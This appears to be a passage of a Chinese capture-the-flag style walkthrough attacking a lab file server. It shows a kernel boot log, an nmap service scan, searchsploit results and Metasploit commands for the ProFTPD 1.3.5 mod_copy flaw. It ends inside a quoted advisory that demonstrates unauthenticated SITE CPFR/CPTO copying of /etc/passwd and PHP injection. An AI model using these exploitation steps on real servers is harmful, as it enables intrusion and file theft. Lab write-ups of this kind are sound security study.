[ 4672.568949] ACPI: (supports S0 S5)
[ 4672.568949] ACPI: Using IOAPIC for interrupt routing
[ 4672.569046] PCI: Ignoring host bridge windows from ACPI; if necessary, use "pci=use_crs" and report a bug
[ 4672.571183] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])
[ 4672.571186] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI]
[ 4672.571403] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI]
[ 4672.571471] acpi PNP0A03:00: host bridge window [io 0x0000-0x0cf7] (ignored)
[ 4672.571472] acpi PNP0A03:00: host bridge window [io 0x0d00-0xffff] (ignored)
[ 4672.571473] acpi PNP0A03:00: host bridge window [mem 0x000a0000-0x000bffff] (ignored)
[ 4672.571474] acpi PNP0A03:00: host bridge window [mem 0xe0000000-0xfdffffff] (ignored)
[ 4672.571475] PCI: root bus 00: using default resources
[ 4672.571476] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge.
[ 4672.571633] PCI host bridge to bus 0000:00
[ 4672.571638] pci_bus 0000:00: root bus resource [bus 00-ff]
[ 4672.571639] pci_bus 0000:00: root bus resource [io 0x0000-0xffff]
[ 4672.571640] pci_bus 0000:00: root bus resource [mem 0x00000000-0x7fffffffff]
[ 4672.571670] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000
[ 4672.571995] pci 0000:00:01.0: [8086:7000] type 00 class 0x060100
[ 4672.572391] pci 0000:00:01.1: [8086:7111] type 00 class 0x01018a
[ 4672.572637] pci 0000:00:01.1: reg 0x20: [io 0xd000-0xd00f]
[ 4672.572728] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7]
[ 4672.572729] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6]
[ 4672.572730] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177]
[ 4672.572731] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376]
[ 4672.572862] pci 0000:00:02.0: [15ad:0405] type 00 class 0x030000
[ 4672.575458] pci 0000:00:02.0: reg 0x10: [io 0xd010-0xd01f]
[ 4672.577958] pci 0000:00:02.0: reg 0x14: [mem 0xf0000000-0xf0ffffff pref]
[ 4672.580258] pci 0000:00:02.0: reg 0x18: [mem 0xf1000000-0xf11fffff]
[ 4672.589511] pci 0000:00:03.0: [8086:100e] type 00 class 0x020000
[ 4672.591631] pci 0000:00:03.0: reg 0x10: [mem 0xf1200000-0xf121ffff]
[ 4672.595805] pci 0000:00:03.0: reg 0x18: [io 0xd020-0xd027]
[ 4672.604285] pci 0000:00:04.0: [80ee:cafe] type 00 class 0x088000
[ 4672.606353] pci 0000:00:04.0: reg 0x10: [io 0xd040-0xd05f]
[ 4672.608318] pci 0000:00:04.0: reg 0x14: [mem 0xf1400000-0xf17fffff]
[ 4672.610326] pci 0000:00:04.0: reg 0x18: [mem 0xf1800000-0xf1803fff pref]
[ 4672.618603] pci 0000:00:05.0: [8086:2415] type 00 class 0x040100
[ 4672.618664] pci 0000:00:05.0: reg 0x10: [io 0xd100-0xd1ff]
[ 4672.618705] pci 0000:00:05.0: reg 0x14: [io 0xd200-0xd23f]
[ 4672.619091] pci 0000:00:06.0: [106b:003f] type 00 class 0x0c0310
[ 4672.621494] pci 0000:00:06.0: reg 0x10: [mem 0xf1804000-0xf1804fff]
[ 4672.635601] pci 0000:00:07.0: [8086:7113] type 00 class 0x068000
[ 4672.635830] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI
[ 4672.635837] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB
[ 4672.636006] pci 0000:00:0b.0: [8086:265c] type 00 class 0x0c0320
[ 4672.638196] pci 0000:00:0b.0: reg 0x10: [mem 0xf1805000-0xf1805fff]
[ 4672.650023] pci 0000:00:0d.0: [8086:2829] type 00 class 0x010601
[ 4672.651929] pci 0000:00:0d.0: reg 0x10: [io 0xd240-0xd247]
[ 4672.653828] pci 0000:00:0d.0: reg 0x14: [io 0xd248-0xd24b]
[ 4672.655647] pci 0000:00:0d.0: reg 0x18: [io 0xd250-0xd257]
[ 4672.657493] pci 0000:00:0d.0: reg 0x1c: [io 0xd258-0xd25b]
[ 4672.659379] pci 0000:00:0d.0: reg 0x20: [io 0xd260-0xd26f]
[ 4672.661290] pci 0000:00:0d.0: reg 0x24: [mem 0xf1806000-0xf1807fff]
[ 4672.664090] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11)
[ 4672.664214] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11)
[ 4672.664261] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11)
[ 4672.664307] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11)
[ 4672.664375] ACPI: Enabled 2 GPEs in block 00 to 07
[ 4672.664530] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
[ 4672.664532] vgaarb: loaded
[ 4672.664533] vgaarb: bridge control possible 0000:00:02.0
[ 4672.664588] SCSI subsystem initialized
[ 4672.664607] ACPI: bus type USB registered
[ 4672.664618] usbcore: registered new interface driver usbfs
[ 4672.664623] usbcore: registered new interface driver hub
[ 4672.664646] usbcore: registered new device driver usb
[ 4672.664715] PCI: Using ACPI for IRQ routing
[ 4672.664716] PCI: pci_cache_line_size set to 64 bytes
[ 4672.664852] e820: reserve RAM buffer [mem 0x0009fc00-0x0009ffff]
[ 4672.664856] e820: reserve RAM buffer [mem 0xdfff0000-0xdfffffff]
[ 4672.664856] e820: reserve RAM buffer [mem 0x11d000000-0x11fffffff]
[ 4672.664918] NetLabel: Initializing
[ 4672.664918] NetLabel: domain hash size = 128
[ 4672.664919] NetLabel: protocols = UNLABELED CIPSOv4
[ 4672.664929] NetLabel: unlabeled traffic allowed by default
[ 4672.664951] Switching to clocksource kvm-clock
[ 4672.667752] pnp: PnP ACPI init
[ 4672.667757] ACPI: bus type PNP registered
[ 4672.667814] pnp 00:00: Plug and Play ACPI device, IDs PNP0303 (active)
[ 4672.667822] pnp 00:01: [dma 4]
[ 4672.667828] pnp 00:01: Plug and Play ACPI device, IDs PNP0200 (active)
[ 4672.667880] pnp 00:02: Plug and Play ACPI device, IDs PNP0f03 (active)
[ 4672.668230] pnp: PnP ACPI: found 3 devices
[ 4672.668231] ACPI: bus type PNP unregistered
[ 4672.673312] pci_bus 0000:00: resource 4 [io 0x0000-0xffff]
[ 4672.673313] pci_bus 0000:00: resource 5 [mem 0x00000000-0x7fffffffff]
[ 4672.673336] NET: Registered protocol family 2
[ 4672.673431] TCP established hash table entries: 32768 (order: 6, 262144 bytes)
[ 4672.673480] TCP bind hash table entries: 32768 (order: 7, 524288 bytes)
[ 4672.673787] TCP: Hash tables configured (established 32768 bind 32768)
[ 4672.673797] TCP: reno registered
[ 4672.673800] UDP hash table entries: 2048 (order: 4, 65536 bytes)
[ 4672.673808] UDP-Lite hash table entries: 2048 (order: 4, 65536 bytes)
[ 4672.673839] NET: Registered protocol family 1
[ 4672.673850] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
[ 4672.673868] pci 0000:00:01.0: Activating ISA DMA hang workarounds
[ 4672.673887] pci 0000:00:02.0: Boot video device
[ 4672.675158] PCI: CLS 0 bytes, default 64
[ 4672.675194] Unpacking initramfs...
[ 4672.852865] Freeing initrd memory: 15784k freed
[ 4672.854393] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
[ 4672.854398] software IO TLB [mem 0xdbff0000-0xdfff0000] (64MB) mapped at [ffff8800dbff0000-ffff8800dffeffff]
[ 4672.854554] platform rtc_cmos: registered platform RTC device (no PNP device found)
[ 4672.854646] microcode: CPU0 sig=0x906e9, pf=0x2, revision=0x0
[ 4672.854657] microcode: Microcode Update Driver: v2.00 <tigran@aivazian.fsnet.co.uk>, Peter Oruba
[ 4672.854782] futex hash table entries: 256 (order: 2, 16384 bytes)
[ 4672.854789] Initialise system trusted keyring
[ 4672.854827] audit: initializing netlink socket (disabled)
[ 4672.854834] type=2000 audit(1582102791.576:1): initialized
[ 4672.871388] HugeTLB registered 2 MB page size, pre-allocated 0 pages
[ 4672.872026] zbud: loaded
[ 4672.872119] VFS: Disk quotas dquot_6.5.2
[ 4672.872134] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 4672.872231] msgmni has been set to 7484
[ 4672.872279] Key type big_key registered
[ 4672.872281] SELinux: Registering netfilter hooks
[ 4672.872513] alg: No test for stdrng (krng)
[ 4672.872516] NET: Registered protocol family 38
[ 4672.872519] Key type asymmetric registered
[ 4672.872521] Asymmetric key parser 'x509' registered
[ 4672.872537] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 252)
[ 4672.872548] io scheduler noop registered
[ 4672.872550] io scheduler deadline registered (default)
[ 4672.872561] io scheduler cfq registered
[ 4672.872616] pci_hotplug: PCI Hot Plug PCI Core version: 0.5
[ 4672.872623] pciehp: PCI Express Hot Plug Controller Driver version: 0.4
[ 4672.872657] intel_idle: does not run on family 6 model 158
[ 4672.872737] ACPI: AC Adapter [AC] (on-line)
[ 4672.872761] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0
[ 4672.872763] ACPI: Power Button [PWRF]
[ 4672.872797] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1
[ 4672.872798] ACPI: Sleep Button [SLPF]
[ 4672.872849] GHES: HEST is not enabled!
[ 4672.872925] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
[ 4672.873095] Non-volatile memory driver v1.3
[ 4672.873097] Linux agpgart interface v0.103
[ 4672.873174] crash memory driver: version 1.1
[ 4672.873187] rdac: device handler registered
[ 4672.873602] ACPI: Battery Slot [BAT0] (battery present)
[ 4672.873636] hp_sw: device handler registered
[ 4672.873639] emc: device handler registered
[ 4672.873641] alua: device handler registered
[ 4672.873683] libphy: Fixed MDIO Bus: probed
[ 4672.873701] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 4672.873704] ehci-pci: EHCI PCI platform driver
[ 4672.874000] ehci-pci 0000:00:0b.0: EHCI Host Controller
[ 4672.874021] ehci-pci 0000:00:0b.0: new USB bus registered, assigned bus number 1
[ 4672.874271] ehci-pci 0000:00:0b.0: irq 19, io mem 0xf1805000
[ 4672.880154] ehci-pci 0000:00:0b.0: USB 2.0 started, EHCI 1.00
[ 4672.880248] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002
[ 4672.880253] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 4672.880256] usb usb1: Product: EHCI Host Controller
[ 4672.880259] usb usb1: Manufacturer: Linux 3.10.0-229.el7.x86_64 ehci_hcd
[ 4672.880262] usb usb1: SerialNumber: 0000:00:0b.0
[ 4672.880433] hub 1-0:1.0: USB hub found
[ 4672.880443] hub 1-0:1.0: 12 ports detected
[ 4672.880710] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 4672.880719] ohci-pci: OHCI PCI platform driver
[ 4672.881423] ohci-pci 0000:00:06.0: OHCI PCI host controller
[ 4672.881471] ohci-pci 0000:00:06.0: new USB bus registered, assigned bus number 2
[ 4672.881564] ohci-pci 0000:00:06.0: irq 22, io mem 0xf1804000
[ 4672.934441] usb usb2: New USB device found, idVendor=1d6b, idProduct=0001
[ 4672.934449] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[ 4672.934455] usb usb2: Product: OHCI PCI host controller
[ 4672.934460] usb usb2: Manufacturer: Linux 3.10.0-229.el7.x86_64 ohci_hcd
[ 4672.934464] usb usb2: SerialNumber: 0000:00:06.0
[ 4672.934683] hub 2-0:1.0: USB hub found
[ 4672.934713] hub 2-0:1.0: 12 ports detected
[ 4672.935397] uhci_hcd: USB Universal Host Controller Interface driver
[ 4672.935505] usbcore: registered new interface driver usbserial
[ 4672.935517] usbcore: registered new interface driver usbserial_generic
[ 4672.935529] usbserial: USB Serial support registered for generic
[ 4672.935577] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12
[ 4672.936484] serio: i8042 KBD port at 0x60,0x64 irq 1
[ 4672.936494] serio: i8042 AUX port at 0x60,0x64 irq 12
[ 4672.936669] mousedev: PS/2 mouse device common for all mice
[ 4672.937276] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2
[ 4672.939750] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0
[ 4672.939886] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram
[ 4672.939980] cpuidle: using governor menu
[ 4672.940088] hidraw: raw HID events driver (C) Jiri Kosina
[ 4672.940336] usbcore: registered new interface driver usbhid
[ 4672.940339] usbhid: USB HID core driver
[ 4672.940416] drop_monitor: Initializing network drop monitor service
[ 4672.940600] TCP: cubic registered
[ 4672.940607] Initializing XFRM netlink socket
[ 4672.940750] NET: Registered protocol family 10
[ 4672.941594] NET: Registered protocol family 17
[ 4672.941968] Loading compiled-in X.509 certificates
[ 4672.942011] Loaded X.509 cert 'CentOS Linux kpatch signing key: ea0413152cde1d98ebdca3fe6f0230904c9ef717'
[ 4672.942066] Loaded X.509 cert 'CentOS Linux Driver update signing key: 7f421ee0ab69461574bb358861dbe77762a4201b'
[ 4672.943072] Loaded X.509 cert 'CentOS Linux kernel signing key: a62a0e1d6a6e484e9bfd7368af34081048e535e5'
[ 4672.943108] registered taskstats version 1
[ 4672.946980] Key type trusted registered
[ 4672.950493] Key type encrypted registered
[ 4672.953912] IMA: No TPM chip found, activating TPM-bypass!
[ 4672.954878] rtc_cmos rtc_cmos: setting system clock to 2020-02-19 07:41:57 UTC (1582098117)
[ 4672.956622] Freeing unused kernel memory: 1604k freed
[ 4672.962698] systemd[1]: systemd 208 running in system mode. (+PAM +LIBWRAP +AUDIT +SELINUX +IMA +SYSVINIT +LIBCRYPTSETUP +GCRYPT +ACL +XZ)
[ 4672.962794] systemd[1]: Detected virtualization 'kvm'.
[ 4672.962801] systemd[1]: Running in initial RAM disk.
[ 4672.962950] systemd[1]: Set hostname to <fileserver>.
[ 4672.987040] systemd[1]: Expecting device dev-disk-by\x2duuid-18b0d984\x2d25fb\x2d4a58\x2da008\x2dc0410d32b0cb.device...
[ 4672.987049] systemd[1]: Starting -.slice.
[ 4672.987163] systemd[1]: Created slice -.slice.
[ 4672.987191] systemd[1]: Starting System Slice.
[ 4672.987233] systemd[1]: Created slice System Slice.
[ 4672.987256] systemd[1]: Starting Slices.
[ 4672.987263] systemd[1]: Reached target Slices.
[ 4672.987282] systemd[1]: Starting Timers.
[ 4672.987288] systemd[1]: Reached target Timers.
[ 4672.987956] systemd[1]: Starting Journal Socket.
[ 4672.988000] systemd[1]: Listening on Journal Socket.
[ 4672.988059] systemd[1]: Started dracut ask for additional cmdline parameters.
[ 4672.988156] systemd[1]: Starting dracut cmdline hook...
[ 4672.988530] systemd[1]: Started Load Kernel Modules.
[ 4672.988549] systemd[1]: Starting Setup Virtual Console...
[ 4672.988739] systemd[1]: Starting Journal Service...
[ 4672.988961] systemd[1]: Started Journal Service.
[ 4673.140330] systemd-udevd[192]: starting version 208
[ 4673.151786] psmouse serio1: alps: Unknown ALPS touchpad: E7=10 00 64, EC=10 00 64
[ 4673.152548] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input3
[ 4673.191542] [drm] Initialized drm 1.1.0 20060810
[ 4673.196901] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI
[ 4673.196903] e1000: Copyright (c) 1999-2006 Intel Corporation.
[ 4673.201332] libata version 3.00 loaded.
[ 4673.565788] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 08:00:27:5f:f2:ea
[ 4673.565793] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection
[ 4673.565810] ahci 0000:00:0d.0: version 3.0
[ 4673.566386] ahci: SSS flag set, parallel bus scan disabled
[ 4673.566822] ahci 0000:00:0d.0: AHCI 0001.0100 32 slots 1 ports 3 Gbps 0x1 impl SATA mode
[ 4673.566826] ahci 0000:00:0d.0: flags: 64bit ncq stag only ccc
[ 4673.568761] systemd-udevd[197]: renamed network interface eth0 to enp0s3
[ 4673.569635] scsi host0: ahci
[ 4673.569702] ata1: SATA max UDMA/133 abar m8192@0xf1806000 port 0xf1806100 irq 21
[ 4673.569788] ata_piix 0000:00:01.1: version 2.13
[ 4673.571986] scsi host1: ata_piix
[ 4673.572049] scsi host2: ata_piix
[ 4673.572070] ata2: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14
[ 4673.572072] ata3: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15
[ 4673.573153] [drm] DMA map mode: Using physical TTM page addresses.
[ 4673.573189] [drm] Capabilities:
[ 4673.573190] [drm] Cursor.
[ 4673.573191] [drm] Cursor bypass 2.
[ 4673.573192] [drm] Alpha cursor.
[ 4673.573192] [drm] 3D.
[ 4673.573193] [drm] Extended Fifo.
[ 4673.573194] [drm] Pitchlock.
[ 4673.573194] [drm] Irq mask.
[ 4673.573195] [drm] GMR.
[ 4673.573196] [drm] Traces.
[ 4673.573197] [drm] GMR2.
[ 4673.573197] [drm] Screen Object 2.
[ 4673.573198] [drm] Max GMR ids is 8192
[ 4673.573199] [drm] Max number of GMR pages is 1048576
[ 4673.573200] [drm] Max dedicated hypervisor surface memory is 507904 kiB
[ 4673.573201] [drm] Maximum display memory size is 16384 kiB
[ 4673.573202] [drm] VRAM at 0xf0000000 size is 16384 kiB
[ 4673.573203] [drm] MMIO at 0xf1000000 size is 2048 kiB
[ 4673.573204] [drm] global init.
[ 4673.573537] [TTM] Zone kernel: Available graphics memory: 1916828 kiB
[ 4673.573539] [TTM] Initializing pool allocator
[ 4673.573541] [TTM] Initializing DMA pool allocator
[ 4673.573688] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[ 4673.573689] [drm] No driver support for vblank timestamp query.
[ 4673.573801] [drm] Screen objects system initialized
[ 4673.573845] [drm] width 720
[ 4673.573852] [drm] height 400
[ 4673.573859] [drm] bpp 32
[ 4673.574002] [drm] Fifo max 0x00200000 min 0x00001000 cap 0x00000355
[ 4673.577021] fbcon: svgadrmfb (fb0) is primary device
[ 4673.578625] Console: switching to colour frame buffer device 100x37
[ 4673.579296] [drm] Initialized vmwgfx 2.6.0 20140325 for 0000:00:02.0 on minor 0
[ 4673.739811] ata3.00: ATAPI: VBOX CD-ROM, 1.0, max UDMA/133
[ 4673.740640] ata3.00: configured for UDMA/33
[ 4673.850260] tsc: Refined TSC clocksource calibration: 2808.616 MHz
[ 4673.876704] ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300)
[ 4673.877038] ata1.00: ATA-6: VBOX HARDDISK, 1.0, max UDMA/133
[ 4673.877045] ata1.00: 45557632 sectors, multi 128: LBA48 NCQ (depth 31/32)
[ 4673.877680] ata1.00: configured for UDMA/133
[ 4673.877863] scsi 0:0:0:0: Direct-Access ATA VBOX HARDDISK 1.0 PQ: 0 ANSI: 5
[ 4673.879287] scsi 2:0:0:0: CD-ROM VBOX CD-ROM 1.0 PQ: 0 ANSI: 5
[ 4673.905098] sd 0:0:0:0: [sda] 45557632 512-byte logical blocks: (23.3 GB/21.7 GiB)
[ 4673.905150] sd 0:0:0:0: [sda] Write Protect is off
[ 4673.905156] sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00
[ 4673.905178] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[ 4673.907818] sda: sda1 sda2 sda3
[ 4673.907931] sr 2:0:0:0: [sr0] scsi3-mmc drive: 32x/32x xa/form2 tray
[ 4673.907936] cdrom: Uniform CD-ROM driver Revision: 3.20
[ 4673.908369] sr 2:0:0:0: Attached scsi CD-ROM sr0
[ 4673.911004] sd 0:0:0:0: [sda] Attached SCSI disk
[ 4674.012437] SGI XFS with ACLs, security attributes, large block/inode numbers, no debug enabled
[ 4674.014226] XFS (sda3): Mounting V4 Filesystem
[ 4674.117064] XFS (sda3): Ending clean mount
[ 4674.309994] systemd-journald[82]: Received SIGTERM
[ 4674.328786] SELinux: Disabled at runtime.
[ 4674.328796] SELinux: Unregistering netfilter hooks
[ 4674.328870] type=1404 audit(1582098118.873:2): selinux=0 auid=4294967295 ses=4294967295
[ 4674.333698] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 4674.333886] systemd[1]: Inserted module 'ip_tables'
[ 4674.553594] RPC: Registered named UNIX socket transport module.
[ 4674.553596] RPC: Registered udp transport module.
[ 4674.553596] RPC: Registered tcp transport module.
[ 4674.553597] RPC: Registered tcp NFSv4.1 backchannel transport module.
[ 4674.583546] systemd-journald[335]: Received request to flush runtime journal from PID 1
[ 4674.594987] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
[ 4674.622137] ACPI: Video Device [GFX0] (multi-head: yes rom: no post: no)
[ 4674.622167] input: Video Bus as /devices/LNXSYSTM:00/device:00/PNP0A03:00/LNXVIDEO:00/input/input4
[ 4674.670077] piix4_smbus 0000:00:07.0: SMBus Host Controller at 0x4100, revision 0
[ 4674.684538] sd 0:0:0:0: Attached scsi generic sg0 type 0
[ 4674.684553] sr 2:0:0:0: Attached scsi generic sg1 type 5
[ 4674.689901] input: PC Speaker as /devices/platform/pcspkr/input/input5
[ 4674.757668] snd_intel8x0 0000:00:05.0: disable (unknown or VT-d) VM optimization
[ 4674.785189] alg: No test for __gcm-aes-aesni (__driver-gcm-aes-aesni)
[ 4674.792083] ppdev: user-space parallel port driver
[ 4674.927646] Adding 2278396k swap on /dev/sda2. Priority:-1 extents:1 across:2278396k FS
[ 4674.944905] XFS (sda1): Mounting V4 Filesystem
[ 4676.860755] alg: No test for crc32 (crc32-pclmul)
[ 4677.696783] floppy0: no floppy controllers found
[ 4677.696841] work still pending
[ 4678.354902] snd_intel8x0 0000:00:05.0: white list rate for 1028:0177 is 48000
[ 4679.134054] XFS (sda1): Ending clean mount
[ 4679.205811] type=1305 audit(1582098123.749:3): audit_pid=525 old=0 auid=4294967295 ses=4294967295 res=1
这份dmesg是 Linux 系统内核启动与运行全流程日志,记录了靶机从开机上电、内核初始化、硬件识别、服务加载到系统启动完成的所有底层信息。
都没有啥用没有可以利用的地方
我们重新探测一下端口详细信息
nmap -p- -sV -A -T4 192.168.59.148
-sV : 扫描每个端口上跑的服务的「版本号」
-A : 全面扫描,包括操作系统版本、服务的详细信息、脚本扫描
┌──(root㉿kali)-[~/桌面]
└─# nmap -p- -sV -A -T4 192.168.59.148
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-15 04:49 EDT
Nmap scan report for 192.168.59.148
Host is up (0.00045s latency).
Not shown: 64457 filtered tcp ports (no-response), 66 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.59.135
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 35943/udp6 nlockmgr
| 100021 1,3,4 51833/udp nlockmgr
| 100021 1,3,4 53580/tcp6 nlockmgr
| 100021 1,3,4 56447/tcp nlockmgr
| 100024 1 50132/udp6 status
| 100024 1 50348/tcp6 status
| 100024 1 51559/udp status
| 100024 1 56984/tcp status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:30:A8:E2 (VMware)
Aggressive OS guesses: Linux 3.4 - 3.10 (98%), Synology DiskStation Manager 5.2-5644 (97%), Linux 2.6.32 - 3.10 (96%), Linux 3.10 (94%), Linux 3.2 - 3.10 (94%), Linux 3.2 - 3.16 (94%), Linux 3.2 - 4.14 (94%), Linux 2.6.32 - 3.5 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix
Host script results:
| smb2-time:
| date: 2026-04-15T16:50:40
|_ start_date: N/A
|_clock-skew: mean: 6h09m58s, deviation: 3h10m29s, median: 7h59m57s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2026-04-15T22:20:41+05:30
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.59.148
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.88 seconds
通过详细信息我们可以发现
2121也是一个ftp是 ProFTPD 1.3.5
正常运维场景里,管理员绝大对数不会在一台服务器上同时部署两个独立的 FTP 服务
所以我们可以怀疑这里是一个突破口
查询一下
searchsploit ProFTPD
发现有很多漏洞
我们可以发现有4个1.3.5版本的
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
| 英文原标题 | 标准中文翻译 |
|---|---|
| ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | ProFTPd 1.3.5 - 基于 mod_copy 模块的命令执行漏洞(Metasploit 利用模块) |
| ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | ProFTPd 1.3.5 - 基于 mod_copy 模块的远程命令执行漏洞 |
| ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | ProFTPd 1.3.5 - 基于 mod_copy 模块的远程命令执行漏洞(第二版) |
| ProFTPd 1.3.5 - File Copy | ProFTPd 1.3.5 - 文件复制漏洞 |
我们可以先尝试用msf
msfconsole
search proftpd mod_copy
use 0
查看一下参数
show options
设置一下rhosts
set rhosts 192.168.59.148
设置rport_ftp
set rport_ftp 2121
再次查看一下
我们run一下看看
发现失败了
翻译:
[-] 攻击因故障中断:将PHP木马文件复制到网站目录失败,目标目录没有写入权限?
这个模块,必须依赖「FTP 可写入 Web 目录」的前提,但靶场 FTP 和 Web 目录完全隔离所以我们无法用msf这个模块
尝试一下别的
去看看刚刚最底下的txt文件
searchsploit -m linux/remote/36742.txt
查看一下
┌──(root㉿kali)-[~/桌面]
└─# cat 36742.txt
Description TJ Saunders 2015-04-07 16:35:03 UTC
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:
---------------------------------
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR <sp> pathname
214-CPTO <sp> pathname
214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
214-SYMLINK <sp> source <sp> destination
214-RMDIR <sp> path
214-MKDIR <sp> path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /tmp/passwd.copy
250 Copy successful
-----------------------------------------
He provides another, scarier example:
------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
